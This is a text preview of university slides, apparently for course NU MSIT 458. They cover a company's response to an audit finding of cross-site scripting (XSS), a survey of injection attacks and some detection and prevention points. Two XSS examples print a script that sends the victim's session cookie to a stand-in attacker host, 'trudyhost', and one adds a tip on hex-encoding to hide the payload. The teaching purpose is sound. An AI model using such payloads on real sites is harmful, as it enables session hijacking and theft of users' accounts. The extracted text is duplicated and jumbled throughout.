Unformatted text preview:

Web Audit VulnerabilityBusiness ProblemAudit ResponseSlide 4Resolution StepsInvestigationcross-site scriptingXSS conceptAuditor findingXSS typesRisksOur actual riskPlanned Audit ResponseMore on Web AttacksArtifactsCross Site Scripting Example 1Cross Site Scripting Example 2Cross Site Scripting DetectionSQL Injection ExampleSQL Injection DetectionXPATH Injection ExampleLDAP Injection ExampleLDAP Injection DetectionSSI Injection ExampleSSI Injection DetectionJSP Injection ExampleJSP Injection PreventionDefense ApproachesQ&ASlide 30Backup Slidesuser agent injectionApproachesXPATH Injection DetectionWeb Audit Web Audit VulnerabilityVulnerabilitycross-site scripting (XSS) cross-site scripting (XSS) concernsconcernsby Ron Widitzby Ron WiditzBusiness ProblemBusiness ProblemIndependent security auditIndependent security auditRegulatory complianceRegulatory complianceXSS issue raisedXSS issue raisedMust provide a responseMust provide a responseAudit ResponseAudit ResponseEither:Either:–Prove issue to be a non-problemProve issue to be a non-problemoror–Describe actions to takeDescribe actions to takeResolution StepsResolution StepsInvestigate security concernsInvestigate security concernsRestate as IT problem(s)Restate as IT problem(s)Determine solution(s)Determine solution(s)Provide audit responseProvide audit responseMitigate riskMitigate riskInvestigationInvestigationDefine cross-site scripting (XSS)Define cross-site scripting (XSS)Examine how auditors appliedExamine how auditors appliedIdentify risksIdentify risksResearch preliminary solutionsResearch preliminary solutionscross-site scriptingcross-site scriptingAttacker goal: their code into Attacker goal: their code into browserbrowserXSS forces a website to execute XSS forces a website to execute malicious code in browsermalicious code in browserBrowser user is the intended victimBrowser user is the intended victimWhy? Account hijacking, keystroke Why? Account hijacking, keystroke recording, intranet hacking, theft…recording, intranet hacking, theft…XSS conceptXSS conceptAuditor findingAuditor findingFreeform edit Freeform edit boxboxMessage to Message to Customer Customer ServiceServiceXSS typesXSS typesImmediate reflection : phishingImmediate reflection : phishingDOM-based : 95 JavaScript methodsDOM-based : 95 JavaScript methodsRedirection : header, meta, dynamicRedirection : header, meta, dynamicMultimedia : Flash, QT, PDF scriptsMultimedia : Flash, QT, PDF scriptsCross-Site Request Forgery (CSRF)Cross-Site Request Forgery (CSRF) others…others…–(e.g. non-persistent search box)(e.g. non-persistent search box)RisksRisksXSS abuses render engines or XSS abuses render engines or plug-insplug-insSteal browser cookiesSteal browser cookiesSteal session info for replay Steal session info for replay attackattackMalware or bot installationMalware or bot installationRedirect or phishing attemptRedirect or phishing attemptOur actual riskOur actual riskCurrently, none.Currently, none.Edit box info viewed in thick clientEdit box info viewed in thick clientDHTML or JavaScript needs DHTML or JavaScript needs browserbrowserOur thick client is Java Swing-Our thick client is Java Swing-basedbasedPlanned Audit Planned Audit ResponseResponseCould indicate “no audit problem”Could indicate “no audit problem”Might have future impactMight have future impactAddress through dev standardsAddress through dev standardsConsider application firewallConsider application firewallWiden problem scope to include Widen problem scope to include all user agent injection tacticsall user agent injection tacticsMore on Web AttacksMore on Web AttacksCross Site ScriptingCross Site ScriptingSQL InjectionSQL InjectionXPATH InjectionXPATH InjectionLDAP InjectionLDAP InjectionSSI (server side inclusion) SSI (server side inclusion) InjectionInjectionJSP (Java server pages) InjectionJSP (Java server pages) InjectionArtifactsArtifactsFor each injection issue:For each injection issue:–Vulnerability description documentedVulnerability description documented–Preventative coding techniquePreventative coding techniqueDiscuss with App Dev teamsDiscuss with App Dev teams–Publish and socialize directionPublish and socialize direction–Include in peer reviews/code walkthroughsInclude in peer reviews/code walkthroughs–Set deadlines for full incorporationSet deadlines for full incorporationCommunicate with auditorsCommunicate with auditorsCross Site Scripting Cross Site Scripting Example 1Example 1Trudy posts the following JavaScript on Trudy posts the following JavaScript on a message board:a message board:<SCRIPT><SCRIPT>document.location='http://trudyhost/cgdocument.location='http://trudyhost/cgi-bin/i-bin/stealcookie.cgi?'+document.cookiestealcookie.cgi?'+document.cookie</SCRIPT></SCRIPT>When Bob views the posted message, When Bob views the posted message, his browser executes the malicious his browser executes the malicious script, and his session cookie is sent to script, and his session cookie is sent to TrudyTrudyCross Site Scripting Cross Site Scripting Example 2Example 2Trudy sends a link to the following URL to Bob Trudy sends a link to the following URL to Bob that will take him to a personalized page:that will take him to a personalized page:http://host/personalizedpage.php?http://host/personalizedpage.php?username=<script>document.location='http://trusername=<script>document.location='http://trudyhost/cgi-udyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>bin/stealcookie.cgi?'+document.cookie</script>A page is returned that contains the malicious A page is returned that contains the malicious script instead of the username Bob, and Bob’s script instead of the username Bob, and Bob’s browser executes the script causing his session browser executes the script causing his session cookie to be sent to Trudycookie to be sent to TrudyHex is often used in place of ASCII for the Hex is often used in place of ASCII for the JavaScript to make the URL less suspiciousJavaScript to make the URL less suspiciousCross Site Scripting Cross Site Scripting DetectionDetectionA client usually is not supposed to A client usually is not supposed to send scripts to serverssend scripts to servers–If the server receives <SCRIPT>… or If the server receives <SCRIPT>… or the hex equivalent


View Full Document

NU MSIT 458 - Web Audit Vulnerability

Documents in this Course
Snort

Snort

25 pages

Hacked

Hacked

23 pages

Hacked

Hacked

6 pages

Firewalls

Firewalls

52 pages

Load more
Download Web Audit Vulnerability
Our administrator received your request to download this document. We will send you the file to your email shortly.
Loading Unlocking...
Login

Join to view Web Audit Vulnerability and access 3M+ class-specific study document.

or
We will never post anything without your permission.
Don't have an account?
Sign Up

Join to view Web Audit Vulnerability 2 2 and access 3M+ class-specific study document.

or

By creating an account you agree to our Privacy Policy and Terms Of Use

Already a member?